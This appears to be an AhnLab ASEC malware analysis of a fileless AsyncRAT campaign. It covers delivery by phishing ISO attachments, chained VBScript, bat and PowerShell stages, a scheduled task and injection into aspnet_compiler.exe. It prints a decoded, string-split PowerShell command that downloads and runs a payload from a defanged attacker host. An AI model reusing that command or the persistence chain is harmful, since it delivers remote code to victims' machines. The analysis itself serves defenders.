The ASEC analysis team has recently discovered that malicious AsyncRAT codes are being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker.
The compressed file being distributed through phishing emails has an html file and executing this file will save the internal malicious data as an ISO file. ISO is an extension being used commonly in recent times by various malware.
The generated ISO file uses file names related to receipts and invoices, and the ISO file contains VBScript and bat files.
- File Name
The VBScript executes the bat file generated alongside it and the bat file executes an obfuscated command.
The following decoded commands executes a malicious PowerShell command through cmd. The PowerShell command additionally executes another PowerShell command existing in a certain path.
- Decoded command
CMD.EXE /C POWERSHELL.EXE -NOP -WIND HIDDEN -EXEC BYPASS -NONI [BYTE];$XCZM=’IEX(NEW-OBJECT NET.W’;$SYWD=’EBCLIENT).DOWNLO’;[BYTE];$VFDR=’TUUL(”hxxps://aga12[.]ir/ico.png”)’.REPLACE(‘TUUL’,’ADSTRING’);[BYTE];IEX($XCZM+$SYWD+$VFDR)
A portion of the additional PowerShell command looks as below and serves the feature where, after generating a total of 5 script files, executes them. See the list and figures below for features of the 5 generated scripts.
This is the first script file executed after the 5 scripts are generated. This script executes the file C:\ProgramData\Express\xx.bat generated alongside it.
This script has the feature of registering the file C:\ProgramData\Express\Cotrl.vbs on the task scheduler. The files registered on the scheduler are set to be run every 3 minutes.
This script executes the file C:\ProgramData\Express\ Cotrl.vbs.
This script force closes the PowerShell process and executes the file C:\ProgramData\Express\Cotrl.ps1.
This script, which is the last to be executed, is the one that performs the actual malicious behavior. The script contains 2 pieces of malicious data, and these are Loader and AsyncRAT respectively. The first data which performs the role of Loader is loaded and the corresponding data’s GIT.local Execute method is run. Here, the path “C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe” and the second data (AsyncRAT) are transmitted as factors.
The Execute method of GIT.local is as below and using the path and malicious data transmitted as factors, performs an injection on a normal process (C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe).
The injected data is AsyncRAT and is an open-source malicious RAT code published on GitHub. It receives commands from the attacker through C2 and can perform various malicious behaviors and most malicious actions are performed through the transmitted plugin. The default features include Anti-VM, keylogging and remote shell.
There has been an recent increase in the distribution of malware through ISO files. Moreover, the malware is being executed in fileless format, making it difficult for users to identify what type of malware was executed. Users should refrain from opening files from unknown sources and must run regular checkups on their PC.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.